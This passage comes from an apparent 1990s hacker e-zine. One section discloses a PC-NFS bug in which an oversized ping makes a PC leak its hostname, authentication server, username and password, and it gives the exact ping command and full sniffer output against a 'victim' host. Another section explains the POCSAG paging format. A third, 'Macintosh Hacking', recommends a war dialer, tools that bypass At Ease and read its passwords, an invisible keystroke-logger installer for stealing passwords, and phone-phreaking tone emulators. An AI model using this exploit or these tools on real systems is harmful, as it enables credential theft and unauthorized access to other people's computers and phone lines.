  1550.     o The username of the person logged in
  1551.     o The password for the user
  1552.  (Thank you very much!)
  1553.  
  1554. All of this information is in clear text unless PC-NFSí's NETLOGIN is 
  1555. used.  NETLOGIN uses XOR as its encryption, so this is hardly secure 
  1556. either.
  1557.  
  1558. NDIS, ODI, 3C503 drivers on SMC and 3C503 cards have been tested 
  1559. and all freely return the above information on both PC-NFS versions 
  1560. 5.0 and 5.1a.  This should work with other driver/NIC configurations 
  1561. also.
  1562.  
  1563. You get the occasional added bonus of locking up the victims PC as 
  1564. well!
  1565.  
  1566. This bug was new to Sun and they have created a new PCNFS.SYS 
  1567. driver for us.  They have labeled it PC-NFS.SYS version 5.1a.DOD.  
  1568. This new version fills reply ICMP packets with nulls after 200 bytes of
  1569. the requested pattern.
  1570.  
  1571. Until you receive this patch from Sun, I would recommend setting all 
  1572. external router interface MTU to a value of no greater than 1350 as this 
  1573. is point where secrets are contained in the return packet.
  1574.  
  1575. The Unix command to generate the below results is as follows:
  1576.  
  1577.     ping -s -c1 pchost.victim.com 1480
  1578.  
  1579. Use your favorite sniffer to filter ICMP packets and you have it.  If you 
  1580. don'ít have a sniffer, try the -v(erbose) option of ping and convert the 
  1581. hex to ascii starting around byte 1382.
  1582.  
  1583. Sniffer output follows:
  1584.  
  1585. 19:03:48.81 
  1586.         ip: evil.com->pchost.victim.com
  1587.         icmp: echo request
  1588.         62: 024 025 026 027 030 031 032 033 034 035
  1589.         72: 036 037       !   "   #   $   %   &   '
  1590.         82:   (   )   *   +   ,   -   .   /   0   1
  1591.         92:   2   3   4   5   6   7   8   9   :   ;
  1592.         102:   <   =   >   ?   @   A   B   C   D   E
  1593.         112:   F   G   H   I   J   K   L   M   N   O
  1594.         122:   P   Q   R   S   T   U   V   W   X   Y
  1595.         132:   Z   [   \   ]   ^   _   `   a   b   c
  1596.         142:   d   e   f   g   h   i   j   k   l   m
  1597.         152:   n   o   p   q   r   s   t   u   v   w
  1598.         162:   x   y   z   {   |   }   ~ 177 200 201
  1599.         172: 202 203 204 205 206 207 210 211 212 213
  1600.         182: 214 215 216 217 220 221 222 223 224 225
  1601.         192: 226 227 230 231 232 233 234 235 236 237
  1602.         202: 240 241 242 243 244 245 246 247 250 251
  1603.         212: 252 253 254 255 256 257 260 261 262 263
  1604.         222: 264 265 266 267 270 271 272 273 274 275
  1605.         232: 276 277 300 301 302 303 304 305 306 307
  1606.         242: 310 311 312 313 314 315 316 317 320 321
  1607.         252: 322 323 324 325 326 327 330 331 332 333
  1608.         262: 334 335 336 337 340 341 342 343 344 345
  1609.         272: 346 347 350 351 352 353 354 355 356 357
  1610.         282: 360 361 362 363 364 365 366 367 370 371
  1611.         292: 372 373 374 375 376 377 000 001 002 003
  1612.         302: 004 005 006 007 010 011 012 013 014 015
  1613.         312: 016 017 020 021 022 023 024 025 026 027
  1614.         322: 030 031 032 033 034 035 036 037       !
  1615.         332:   "   #   $   %   &   '   (   )   *   +
  1616.         342:   ,   -   .   /   0   1   2   3   4   5
  1617.         352:   6   7   8   9   :   ;   <   =   >   ?
  1618.         362:   @   A   B   C   D   E   F   G   H   I
  1619.         372:   J   K   L   M   N   O   P   Q   R   S
  1620.         382:   T   U   V   W   X   Y   Z   [   \   ]
  1621.         392:   ^   _   `   a   b   c   d   e   f   g
  1622.         402:   h   i   j   k   l   m   n   o   p   q
  1623.         412:   r   s   t   u   v   w   x   y   z   {
  1624.         422:   |   }   ~ 177 200 201 202 203 204 205
  1625.         432: 206 207 210 211 212 213 214 215 216 217
  1626.         442: 220 221 222 223 224 225 226 227 230 231
  1627.         452: 232 233 234 235 236 237 240 241 242 243
  1628.         462: 244 245 246 247 250 251 252 253 254 255
  1629.         472: 256 257 260 261 262 263 264 265 266 267
  1630.         482: 270 271 272 273 274 275 276 277 300 301
  1631.         492: 302 303 304 305 306 307 310 311 312 313
  1632.         502: 314 315 316 317 320 321 322 323 324 325
  1633.         512: 326 327 330 331 332 333 334 335 336 337
  1634.         522: 340 341 342 343 344 345 346 347 350 351
  1635.         532: 352 353 354 355 356 357 360 361 362 363
  1636.         542: 364 365 366 367 370 371 372 373 374 375
  1637.         552: 376 377 000 001 002 003 004 005 006 007
  1638.         562: 010 011 012 013 014 015 016 017 020 021
  1639.         572: 022 023 024 025 026 027 030 031 032 033
  1640.         582: 034 035 036 037       !   "   #   $   %
  1641.         592:   &   '   (   )   *   +   ,   -   .   /
  1642.         602:   0   1   2   3   4   5   6   7   8   9
  1643.         612:   :   ;   <   =   >   ?   @   A   B   C
  1644.         622:   D   E   F   G   H   I   J   K   L   M
  1645.         632:   N   O   P   Q   R   S   T   U   V   W
  1646.         642:   X   Y   Z   [   \   ]   ^   _   `   a
  1647.         652:   b   c   d   e   f   g   h   i   j   k
  1648.         662:   l   m   n   o   p   q   r   s   t   u
  1649.         672:   v   w   x   y   z   {   |   }   ~ 177
  1650.         682: 200 201 202 203 204 205 206 207 210 211
  1651.         692: 212 213 214 215 216 217 220 221 222 223
  1652.         702: 224 225 226 227 230 231 232 233 234 235
  1653.         712: 236 237 240 241 242 243 244 245 246 247
  1654.         722: 250 251 252 253 254 255 256 257 260 261
  1655.         732: 262 263 264 265 266 267 270 271 272 273
  1656.         742: 274 275 276 277 300 301 302 303 304 305
  1657.         752: 306 307 310 311 312 313 314 315 316 317
  1658.         762: 320 321 322 323 324 325 326 327 330 331
  1659.         772: 332 333 334 335 336 337 340 341 342 343
  1660.         782: 344 345 346 347 350 351 352 353 354 355
  1661.         792: 356 357 360 361 362 363 364 365 366 367
  1662.         802: 370 371 372 373 374 375 376 377 000 001
  1663.         812: 002 003 004 005 006 007 010 011 012 013
  1664.         822: 014 015 016 017 020 021 022 023 024 025
  1665.         832: 026 027 030 031 032 033 034 035 036 037
  1666.         842:       !   "   #   $   %   &   '   (   )
  1667.         852:   *   +   ,   -   .   /   0   1   2   3
  1668.         862:   4   5   6   7   8   9   :   ;   <   =
  1669.         872:   >   ?   @   A   B   C   D   E   F   G
  1670.         882:   H   I   J   K   L   M   N   O   P   Q
  1671.         892:   R   S   T   U   V   W   X   Y   Z   [
  1672.         902:   \   ]   ^   _   `   a   b   c   d   e
  1673.         912:   f   g   h   i   j   k   l   m   n   o
  1674.         922:   p   q   r   s   t   u   v   w   x   y
  1675.         932:   z   {   |   }   ~ 177 200 201 202 203
  1676.         942: 204 205 206 207 210 211 212 213 214 215
  1677.         952: 216 217 220 221 222 223 224 225 226 227
  1678.         962: 230 231 232 233 234 235 236 237 240 241
  1679.         972: 242 243 244 245 246 247 250 251 252 253
  1680.         982: 254 255 256 257 260 261 262 263 264 265
  1681.         992: 266 267 270 271 272 273 274 275 276 277
  1682.         1002: 300 301 302 303 304 305 306 307 310 311
  1683.         1012: 312 313 314 315 316 317 320 321 322 323
  1684.         1022: 324 325 326 327 330 331 332 333 334 335
  1685.         1032: 336 337 340 341 342 343 344 345 346 347
  1686.         1042: 350 351 352 353 354 355 356 357 360 361
  1687.         1052: 362 363 364 365 366 367 370 371 372 373
  1688.         1062: 374 375 376 377 000 001 002 003 004 005
  1689.         1072: 006 007 010 011 012 013 014 015 016 017
  1690.         1082: 020 021 022 023 024 025 026 027 030 031
  1691.         1092: 032 033 034 035 036 037       !   "   #
  1692.         1102:   $   %   &   '   (   )   *   +   ,   -
  1693.         1112:   .   /   0   1   2   3   4   5   6   7
  1694.         1122:   8   9   :   ;   <   =   >   ?   @   A
  1695.         1132:   B   C   D   E   F   G   H   I   J   K
  1696.         1142:   L   M   N   O   P   Q   R   S   T   U
  1697.         1152:   V   W   X   Y   Z   [   \   ]   ^   _
  1698.         1162:   `   a   b   c   d   e   f   g   h   i
  1699.         1172:   j   k   l   m   n   o   p   q   r   s
  1700.         1182:   t   u   v   w   x   y   z   {   |   }
  1701.         1192:   ~ 177 200 201 202 203 204 205 206 207
  1702.         1202: 210 211 212 213 214 215 216 217 220 221
  1703.         1212: 222 223 224 225 226 227 230 231 232 233
  1704.         1222: 234 235 236 237 240 241 242 243 244 245
  1705.         1232: 246 247 250 251 252 253 254 255 256 257
  1706.         1242: 260 261 262 263 264 265 266 267 270 271
  1707.         1252: 272 273 274 275 276 277 300 301 302 303
  1708.         1262: 304 305 306 307 310 311 312 313 314 315
  1709.         1272: 316 317 320 321 322 323 324 325 326 327
  1710.         1282: 330 331 332 333 334 335 336 337 340 341
  1711.         1292: 342 343 344 345 346 347 350 351 352 353
  1712.         1302: 354 355 356 357 360 361 362 363 364 365
  1713.         1312: 366 367 370 371 372 373 374 375 376 377
  1714.         1322: 000 001 002 003 004 005 006 007 010 011
  1715.         1332: 012 013 014 015 016 017 020 021 022 023
  1716.         1342: 024 025 026 027 030 031 032 033 034 035
  1717.         1352: 036 037       !   "   #   $   %   &   '
  1718.         1362:   (   )   *   +   ,   -   .   /   0   1
  1719.         1372:   2   3   4   5   6   7   8   9   :   ;
  1720.         1382:   <   =   >   ?   @   A   B   C   D   E
  1721.         1392:   F   G   H   I   J   K   L   M   N   O
  1722.         1402:   P   Q   R   S   T   U   V   W   X   Y
  1723.         1412:   Z   [   \   ]   ^   _   `   a   b   c
  1724.         1422:   d   e   f   g   h   i   j   k   l   m
  1725.         1432:   n   o   p   q   r   s   t   u   v   w
  1726.         1442:   x   y   z   {   |   }   ~ 177 200 201
  1727.         1452: 202 203 204 205 206 207 210 211 212 213
  1728.         1462: 214 215 216 217 220 221 222 223 224 225
  1729.         1472: 226 227 230 231 232 233 234 235 236 237
  1730.         1482: 240 241 242 243 244 245 246 247 250 251
  1731.  
  1732. 19:03:48.85 
  1733.         ip: pchost.victim.com->evil
  1734.         icmp: echo reply
  1735.         62: 024 025 026 027 030 031 032 033 034 035
  1736.         72: 036 037       !   "   #   $   %   &   '
  1737.         82:   (   )   *   +   ,   -   .   /   0   1
  1738.         92:   2   3   4   5   6   7   8   9   :   ;
  1739.         102:   <   =   >   ?   @   A   B   C   D   E
  1740.         112:   F   G   H   I   J   K   L   M   N   O
  1741.         122:   P   Q   R   S   T   U   V   W   X   Y
  1742.         132:   Z   [   \   ]   ^   _   `   a   b   c
  1743.         142:   d   e   f   g   h   i   j   k   l   m
  1744.         152:   n   o   p   q   r   s   t   u   v   w
  1745.         162:   x   y   z   {   |   }   ~ 177 200 201
  1746.         172: 202 203 204 205 206 207 210 211 212 213
  1747.         182: 214 215 216 217 220 221 222 223 224 225
  1748.         192: 226 227 230 231 232 233 234 235 236 237
  1749.         202: 240 241 242 243 244 245 246 247 250 251
  1750.         212: 252 253 254 255 256 257 260 261 262 263
  1751.         222: 264 265 266 267 270 271 272 273 274 275
  1752.         232: 276 277 300 301 302 303 304 305 306 307
  1753.         242: 310 311 312 313 314 315 316 317 320 321
  1754.         252: 322 323 324 325 000 000 324 005   ^   $
  1755.         262:   : 004 000 000 000 000 000 000 000 000
  1756.         272: 036 006   W   V   P   S   Q   R 016 007
  1757.         282: 277   ^   $ 213 367 350   X   p   r   c
  1758.         292: 212   E   "   < 000   u 005 350   V 003
  1759.         302: 353   W   < 005   u 005 350   W 002 353
  1760.         312:   N   < 010   u 007 306 006 325   # 001
  1761.         322: 353   H   < 015   u 007 306 006 325   #
  1762.         332: 001 353   =   < 017   u 007 306 006 325
  1763.         342:   # 001 353   2   < 022   u 005 350 021
  1764.         352: 002 353   $   < 003   u 005 350   9 003
  1765.         362: 353 033   < 022   w 017   2 344 213 360
  1766.         372: 212 204 300   #   P 350 225 305   X 353
  1767.         382: 010   P 270   c 000 350 213 305   X 306
  1768.         392: 006 205 347 000   Z   Y   [   X   ^   _
  1769.         402: 007 037 313   P   S   Q   R   U 036 006
  1770.         412:   W   V 214 310 216 330 216 300 306 006
  1771.         422: 325   # 000 373 277   ^   $ 273   A 347
  1772.         432: 271 006 000 215   6   d   $ 212 004 210
  1773.         442: 005 212 007 210 004   F   G   C 342 363
  1774.         452: 241   x   $ 243   |   $ 241   z   $ 243
  1775.         462:   ~   $ 241 324   ) 243   x   $ 241 326
  1776.         472:   ) 243   z   $ 277   ^   $ 212   E   "
  1777.         482:   < 010   u 015   P 270   ` 000 350   $
  1778.         492: 305   X 350 275 001 353 022   < 015   u
  1779.         502: 012   P 270   a 000 350 023 305   X 353
  1780.         512: 004   < 017   u 003 350 017 000 306 006
  1781.         522: 205 347 000   ^   _ 007 037   ]   Z   Y
  1782.         532:   [   X 303   P 270   < 000 350 363 304
  1783.         542:   X 307   E   $ 000 000 215   u   " 213
  1784.         552:   M 020 206 351 203 351 024 367 301 001
  1785.         562: 000   t 006 213 331 306 000 000   A 321
  1786.         572: 371 350   ,   o 211   ]   $ 307   E 030
  1787.         582: 000 000 215   u 016 271 012 000 350 033
  1788.         592:   o 211   ] 030 213   E 020 206 340 005
  1789.         602: 016 000 243   `   % 211   >   b   % 214
  1790.         612: 016   d   % 277   ^   %   . 376 006   ?
  1791.         622: 020 350   9 276   . 376 016   ? 020 303
  1792.         632:   & 213   E 002 013 300   t 020 243 326
  1793.         642:   #   & 213   ] 004 211 036 330   # 350
  1794.         652: 231   m 353   0 200   > 324   ) 000   t
  1795.         662: 033   & 203   } 006 000   t 024 203   >
  1796.         672: 326   # 000   u 015 350 031 000 203   >
  1797.         682: 326   # 000   t 003 350   u   m 241 326
  1798.         692:   #   & 211   E 002 241 330   #   & 211
  1799.         702:   E 004 303   & 213   M 006 006   V   W
  1800.         712: 016 007 272 000 000 277 334   # 350   $
  1801.         722: 000 241 323   # 243 350   X 203   > 326
  1802.         732:   # 000   u 023 366 006 343 015 001   u
  1803.         742: 014 203   > 350   X 000   u 353 272 001
  1804.         752: 000 342 332   _   ^ 007 303   Q   R   W
  1805.         762: 203 372 000   u 021 203   > 030 214 000
  1806.         772:   t 012 276 004 214 271 003 000 363 245
  1807.         782: 353 010 270 377 377 271 003 000 363 253
  1808.         792: 276   A 347 271 003 000 363 245   _ 270
  1809.         802: 377 377 211   E 036 211   E     241 324
  1810.         812:   ) 211   E 032 241 326   ) 211   E 034
  1811.         822: 270     000 206 340 211   E 020 306   E
  1812.         832: 016   E 306   E 017 000 307   E 022 000
  1813.         842: 000 307   E 024 000 000 306   E 026 002
  1814.         852: 306   E 027 001 307   E 014 010 000   3
  1815.         862: 300 306   E   " 021 210   E   # 211   E
  1816.         872:   & 211   E   ( 350 250 376   Z   Y 303
  1817.         882: 200   > 326   # 000   u 014 213   E   *
  1818.         892: 243 326   # 213   E   , 243 330   #   P
  1819.         902: 270   V 000 350 205 303   X 303   P   S
  1820.         912:   Q   R 213   E   : 213   ]   < 213   M
  1821.         922:   & 213   U   ( 350 223   k   Z   Y   [
  1822.         932:   X   P 270   \ 000 350   e 303   X 303
  1823.         942: 306   E   " 000   P 270   X 000 350   X
  1824.         952: 303   X 303   & 213   E 002   & 213   ]
  1825.         962: 004   & 213   U 006 006   W 016 007 350
  1826.         972:   Y   i   s 003 351 227 000 277 334   #
  1827.         982:   W 271 003 000 363 245 276   A 347 271
  1828.         992: 003 000 363 245   _ 211   E 036 211   ]
  1829.         1002:     241 324   ) 211   E 032 241 326   )
  1830.         1012: 211   E 034 270     000 206 340 211   E
  1831.         1022: 020 306   E 016   E 306   E 017 000 307
  1832.         1032:   E 022 000 000 307   E 024 000 000 306
  1833.         1042:   E 026 377 306   E 027 001 307   E 014
  1834.         1052: 010 000   3 300 306   E   " 010 210   E
  1835.         1062:   # 211   E   & 377 006   h   % 241   h
  1836.         1072:   % 211   E   ( 211 026 350   X 211 026
  1837.         1082:   l   % 307 006   j   % 000 000 350 322
  1838.         1092: 375 203   > 350   X 000   t   # 366 006
  1839.         1102: 343 015 001   u   ! 203   >   j   % 000
  1840.         1112:   t 353 203   >   j   % 001   u 011 241
  1841.         1122:   l   %   + 006 350   X 353 015 270 375
  1842.         1132: 377 353 010 270 376 377 353 003 270 377
  1843.         1142: 377 307 006   l   % 000 000   _ 007   &
  1844.         1152: 211   E 010 303   P 270   ^ 000 350 206
  1845.         1162: 302   X 203   >   l   % 000   t 017 213
  1846.         1172:   ]   (   ; 036   h   %   u 006 307 006
  1847.         1182:   j   % 001 000 303   P 270   ; 000 350
  1848.         1192:   g 302   X 203   >   l   % 000   t 006
  1849.         1202: 307 006   j   % 002 000 303 000 000 000
  1850.         1212: 000 000 000 000 000 000 000 000 000 000
  1851.         1222: 000 000 000 000 000 000 000 000 000 000
  1852.         1232: 000 000 000 000 000 000 000 000 000 000
  1853.         1242: 000 000 000 000 000 000 000 000 002 000
  1854.         1252: 000 000 300   A 000 000 034 000 000 000
  1855.         1262: 200 000 000 000   k 000 000 000 000 016
  1856.         1272: 000 000 000     000 000 000 000 000 000
  1857.         1282: 010 000 000 000 252 001 000 000 010   5
  1858.         1292: 000 000   r 027 301   . 000 000 000 000
  1859.         1302: 036   F 300   . 000 000 000 000 036   F
  1860.         1312: 300   . 000 000 000 000 000 000 000 000
  1861.         1322: 000 000 000 000 000 000 000 000 000 000
  1862.         1332: 000 000 000 000 000 000 000 000 000 000
  1863.         1342: 000 000 000 000 000 000 000 000 000    
  1864.         1352: 000 000 000 002 000 000 200 366   = 000
  1865.         1362:   { 255 023 000 242 265 015 000 002 000
  1866.         1372: 000 000   S 017 005 000   C 003 000 000
  1867.         1382:   p   c   h   o   s   t 000 000 000 000
  1868.         1392: 000 000 000 000 000 000 244   A   @   -
  1869.         1402:   s   e   r   v   e   r   1 000 000 000
  1870.         1412: 000 000 000 000 000 000 244   A   @ 001
  1871.         1422: 000 000 000 000 000 000 000 000 000 000
  1872.         1432: 000 000 000 000 000 000 244   A   @ 001
  1873.         1442:   u   s   e   r   n   a   m   e 000 000
  1874.         1452:   p   a   s   s   w   d 000 000 000 000
  1875.         1462: 000 000 000 000 000 000 000 000 000 000
  1876.         1472: 000 000 000 000 000 000 000 000 000 000
  1877.         1482: 000 000 200 000   k 000 260 271 377 377
  1878.         1492: 344 275   9 212
  1879.  
  1880. The names have been changed to protect the innocent, but the rest is actual.
  1881.  
  1882. Byte 1382:  PC's hostname
  1883. Byte 1402:  PC's Authentication server hostname
  1884. Byte 1382:  The user's account name.  Shows nobody if logged out.
  1885. Byte 1382:  The user's password.
  1886.  
  1887. ------------------------------------------------------------------------------
  1888.  
  1889.         POCSAG paging format, code and code capacity
  1890.  
  1891. The POCSAG (Post Office Code Standardization Advisory Group) code is a
  1892. synchronous paging format that allows pages to be transmitted in a SINGLE-BATCH
  1893. structure. The POCSAG codes provides improved battery-saving capability and an
  1894. increased code capacity.
  1895. The POCSAG code format consists of a preamble and one or more batches of
  1896. codewords. Each batch comprises a 32-bit frame synchronization code and eight
  1897. 64-bit address frames of two 32-bit addresses or idle codewords each. The
  1898. frame synchronization code marks the start of the batch of codewords.
  1899.  
  1900. -PREAMBLE STRUCTURE
  1901. The preamble consists of 576 bits of an alternating 101010 pattern transmitted
  1902. at a bit rate of 512 or 1200 bps. The decoder uses the preamble both to
  1903. determine if the data received is a POCSAG signal and for synchronization with
  1904. the stream of data.
  1905.  
  1906.        |---Preamble----|-----------First Batch-------------|--Subsec. Batch--|
  1907.  
  1908.         ______________________________________________________< <____________
  1909. paging |  576 bits of  | |   |   |   |   |   |   |   |   | |   > >           |
  1910. format |   reversals   |F| | | | | | | | | | | | | | | | |F|                 |
  1911.        | (101010, etc) |S| | | | | | | | | | | | | | | | |S|                 |
  1912.        |_______________|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|__< <____________|
  1913.                                    > >
  1914. 1 FRAME = 2 CODEWORDS
  1915.  
  1916.         Preamble    Batchs
  1917.  
  1918.  512 BPS    1125 mS        1062.5 mS
  1919.  
  1920. 1200 BPS     480 mS         453.3 mS
  1921.  
  1922. CodeWords Structure
  1923.         ____________________________________________________________________
  1924. BIT    |   |              |       |                       |                 |
  1925. NUMBER | 1 |   2 to 19    | 20,21 |       22 to 31        |        32       |
  1926.        |___|______________|_______|_______________________|_________________|
  1927.         ____________________________________________________________________
  1928. ADDRESS|   |              |       |                       |                 | 
  1929. FORMAT | 0 | Address Bits | S I B |   Parity Check Bits   |   Even parity   |
  1930.        |___|______________|_______|_______________________|_________________|
  1931.                               ^ 
  1932.                               Source identifier bits 
  1933.     ____________________________________________________________________
  1934. MESSAGE|   |                      |                       |                 |
  1935. FORMAT | 1 |     Message Bits     |   Parity Check Bits   |   Even parity   |
  1936.        |___|______________________|_______________________|_________________|
  1937.  
  1938. -BATCH STRUCTURE
  1939. A batch consist of frame synchronization code follow by 8 frames of two address
  1940. codewords per frame (16 address codewords per batch). In order to maintain the
  1941. proper batch structure, each frame is filled with two address codewords, or two
  1942. idle codewords, or two message codewords, or any appropriate combination of the
  1943. three codewords types.
  1944.  
  1945. -FRAME SYNCHRONIZATION CODE STRUCTURE
  1946. The frame synchronization (FS) code is a unique, reserved word that is used to
  1947. identify the beginning of each batch. The FS code comprises the 32 bits:
  1948.  
  1949.     011111100110100100001010111011000.
  1950.  
  1951. -OPTIONAL ALTERNATE FRAME SYNCHRONIZATION CODEWORDS
  1952. An alternate frame synchronization (AFS) code can be selected to support special
  1953. systems or systems that require increased coding capability. The AFS is
  1954. generated in the same manner as an address codeword (i.e., BCH codeword with
  1955. parity bits). The POCSAG signaling standard has reserved special codewords for
  1956. the AFS from 2,000,000 to 2,097,151. The use of the AFS requires the paging
  1957. system to support the AFS. The AFS will change to frame 0 on the programmer
  1958. since no frame information is included in the AFS. The AFS should use address
  1959. 1 so that bit 20 and 21 are 0.
  1960.  
  1961. -ADDRESS CODEWORD STRUCTURE
  1962. An address codeword's first bit (bit 1) is always a zero. Bits 2 through 19 are
  1963. the address bits. The pagers looks at these bits to find its own unique
  1964. address. Each POCSAG codeword is capable of providing address information for
  1965. four different paging sources (Address 1 to 4). These address are determined
  1966. by combinations of values of bits 20 and 21 ( the source-identifier bits). Bits
  1967. 22 through 31 are the parity check bits, and bit 32 is the even parity bit.
  1968.  
  1969.  
  1970.         BIT 20        BIT 21
  1971. Address 1         0          0
  1972. Address 2         0           1
  1973. Address 3         1           0
  1974. Address 4         1           1
  1975.  
  1976. Pre-coded into the code plug are three bits which designate the frame location,
  1977. within each batch, at which the pager's address is to be received; the decoder
  1978. will look at the codewords in this frame for its address.
  1979. Power is removed from the receiver during all frames other than the precoded
  1980. one, thus extending pager battery life.
  1981.  
  1982. -CODE CAPACITY 
  1983. The combination of the code plug's three pre-coded frame location bits and address codeword's 18 address bits provides over two million different assignable codes. In this combination, the frame location bits are the least-significant bits, and the addres
  1984. bits are the most-significant bits.
  1985.  
  1986. -MESSAGE CODEWORD STRUCTURE
  1987. A message codeword structure always start with a 1 in bit 1 and always follows
  1988. directly after the address. Each message codeword replaces an address codeword
  1989. in the batch.
  1990.  
  1991. -IDLE CODEWORD STRUCTURE
  1992. The idle codeword is unique, reserved codeword used to talk place of an address
  1993. in any frame that would not otherwise be filled with 64 bits.
  1994. Thus, if a frame contains only an address, an idle codeword comprises the 32
  1995. bits:
  1996.  
  1997. 01111010100010011100000110010111
  1998.  
  1999. -POCSAG CHARACTERS
  2000.  
  2001. CHAR    HEX    |    CHAR    HEX    |    CHAR    HEX    |
  2002.         |            |            |
  2003. #    23    |    $    24    |    @    40    |
  2004. [    5B    |    \    5C    |    ]    5D    |
  2005. ^    5E    |    _    5F    |    '    60    |
  2006. {    7B    |    |    7C    |    }    7D    |
  2007. ~     7E    |    DEL    7F    |    SP    20    |
  2008.  
  2009. ------------------------------------------------------------------------------
  2010.  
  2011. MACINTOSH HACKING
  2012. by Logik Bomb
  2013.  
  2014. "My fellow astronauts..."
  2015. -Dan Quayle
  2016.  
  2017.         Now, two people have mailed Erik Bloodaxe asking about Macintosh
  2018. hacking particularly war dialers, and each time he insulted Macs and tried
  2019. to get someone to write a file on it. No one has done it. So I guess I have
  2020. to.
  2021.         First, some words on Macintoshes. Steve Jobs and Steve Wozniak, the
  2022. originators of the Apple and the Macintosh were busted for phreaking in
  2023. college. The Apple IIe was used almost universally by hackers. So why has
  2024. the Mac fallen out of favor for hacking? Simple. Because it fell out of
  2025. favor for everything else. Apple screwed up and wouldn't let clone makers
  2026. license the MacOS. As a result, 80% of personal computers run DOS, and
  2027. Macintoshes are left in the minority. Second, DOS compatible users, and
  2028. hackers in particular, have an image of Mac users as a bunch of whiny
  2029. lamers who paid too much for a computer and as a result are constantly
  2030. defensive. The solution to this impression is to not be an asshole. I know
  2031. it drives every Mac user crazy when he reads some article about Windows
  2032. 95's brand new, advanced features such as "plug-and-play" that the
  2033. Macintosh has had since 1984. But just try and take it. If it's any
  2034. consolation, a lot of IBM-compatible (a huge misnomer, by the way) users
  2035. hate Windows too.
  2036. Now, on with the software.
  2037. -------------------------
  2038. Assault Dialer 1.5
  2039.         Assault Dialer, by Crush Commando, is the premier Mac war dialer,
  2040. the Mac's answer to ToneLoc. It has an ugly interface, but it's the best we
  2041. have right now.  It is the successor to a previous war dialer known as Holy
  2042. War Dialer 2.0. The only real competitor I've heard of for Assault Dialer
  2043. is Tyrxis Shockwave 2.0, but the only version I could get a hold of was
  2044. 1.0, and it wasn't as good as Assault Dialer, so that's your best bet right
  2045. now.
  2046.  
  2047. MacPGP 2.6.2 and PGPfone 1.0b4
  2048.         MacPGP is the Macintosh port of the infamous PGP (Pretty Good
  2049. Privacy.) This file is not about cryptography, so if you want to know about
  2050. PGP read the fuckin' read me and docs that come with the file. Strangely
  2051. enough, however, Phil Zimmerman released PGPfone, a utility for encrypting
  2052. your phone and making it a secure line, for the Mac _first._ I don't know
  2053. why, and I haven't had a chance to test it, but the idea's pretty cool. If
  2054. PGP doesn't get Zimmerman thrown in jail, this will.
  2055.  
  2056. DisEase 1.0 and DisEase 3.0
  2057.         Schools and concerned parents have always had a problem. Schools
  2058. can't have students deleting the hard drive, and parents don't want their
  2059. kids looking at the kinky pictures they downloaded. So Apple came out with
  2060. At Ease, an operating system that runs over System 7, sort of the same way
  2061. Windows runs off of DOS. However, I can't stand At Ease. Everything about
  2062. it, from the Fisher-Price screen to the interface drives me crazy. It
  2063. drives a lot of other people crazy too. So it was just a matter of time
  2064. before someone made a program to override it. The first was DisEase 1.0, a
  2065. small program by someone calling himself Omletman, that would override At
  2066. Ease if you put in a floppy loaded with it and clicked six times. Omletman
  2067. improved this design and eventually released 3.0. (I haven't been able to
  2068. find any evidence that a 2.0 was ever released) 3.0 has such cool features
  2069. as reading the preferences file to give you the password, so you can change
  2070. the obnoxious greeting teachers always put to something more sinister. The
  2071. only problem with 3.0 is that some configurations of At Ease only let
  2072. documents be read off of disks; no applications, which means DisEase 3.0
  2073. won't appear, and so you can't run it. However, with 1.0 you don't have to
  2074. actually open the application, you just click six times, so if you use 1.0
  2075. to get to the finder, and then 3.0 to read the passwords, things will work.
  2076.  
  2077. Invisible Oasis Installer
  2078.         Oasis is a keystroke recorder, so you can find out passwords.
  2079. However, with the original Oasis, you had to put it in the Extensions
  2080. folder and make it invisible with ResEdit, which takes a while. Invisible
  2081. Oasis Installer, however, installs it where it should be and automatically
  2082. makes it invisible.
  2083. "So everything's wrapped up in a nice neat little _package_, then?"
  2084. -Homer Simpson
  2085.  
  2086. Anonymity 2.0 and Repersonalize 1.0
  2087.         Anonymity, version 1.2, was a rather old program whose author has
  2088. long been forgotten that was the best data fork alterer available. It
  2089. removed the personalization to programs. However, in around 1990 someone
  2090. named the Doctor made 2.0, a version with some improvements. Repersonalize
  2091. was made in 1988 (God, Mac hacking programs are old) which reset
  2092. personalization on some of the Microsoft and Claris programs, so you could
  2093. enter a different personalization name. I don't know if it will still work
  2094. on Microsoft Word 6.0.1 and versions of programs released recently, but I
  2095. don't really care because I use Word 5.1a and I'm probably not going to
  2096. upgrade for a while.
  2097.  
  2098. Phoney (AKA Phoney4Mac)
  2099.         Phoney is an excellent program that emulates the Blue Box, Red Box,
  2100. Black Box and Green Box tones. There is also Phoney4Newton, which does the
  2101. same thing on the most portable of computers, the Newton.
  2102.  
  2103.         That's all I'm covering in this file as far as Mac hacking
  2104. programs. You'll probably want to know where to find all this crap, so here
  2105. are all of the Mac hacking ftp and Web sites I know of:
  2106. Space Rogue's Whacked Mac Archives (http://l0pht.com/~spacerog/index.html)
  2107.         This site, run by Space Rogue is L0pht Heavy Industries' Mac site.
  2108. It is probably the largest and best archive of Mac hacking software
  2109. connected to the Internet. The problem with this is that it can't handle
  2110. more than two anonymous users, meaning that unless you pay to be part of
  2111. L0pht, you will never get into this archive. I've tried getting up at 4:30
  2112. AM, thinking that no one in their right mind would possibly be awake at
  2113. this time, but there is always, somehow, somewhere, two people in Iceland
  2114. or Singapore or somewhere on this site.
  2115. The Mac Hacking Home Page (http://www.aloha.com/~seanw/index.html)
  2116.         This site does not look like much, and it is fairly obvious that
  2117. its maintainer, Sean Warren, is still learning HTML, but it is reliable and
  2118. is a good archive. It is still growing, probably due to the fact that it is
  2119. one of the only Internet Mac hacking sites anyone can get to and upload.
  2120. Kn0wledge Phreak <k0p> (http://www.uccs.edu/~abusby/k0p.html)
  2121.         This is an excellent site and has many good programs. There is one
  2122. catch, however. It's maintainer, Ole Buzzard, is actually getting the files
  2123. from his BBS. So many of the really good files are locked away in the k0p
  2124. BBS, and those of us who can't pay long distance can't get the files. Oh
  2125. well.
  2126. Bone's H/P/C Page o' rama- part of the Cyber Rights Now! home page
  2127. (http://www.lib.iup.edu/~seaman/index.html)
  2128.         While this is hardly a Macintosh hacking site, it's just a hacking
  2129. site, it does have very few Mac files, some of which are hard to get to.
  2130. However, Bone might get expelled because of a long story involving AOHell,
  2131. so this page might not be here. Then again, maybe Bone won't get expelled
  2132. and this site will stay. Never can tell 'bout the future, can you?
  2133. "We predict the future. We invent it."
  2134.         -Nasty government guy on the season premiere of _The X-Files_
  2135.  
  2136. Andy Ryder
  2137. Netsurfer and Road Warrior on the Info Highway
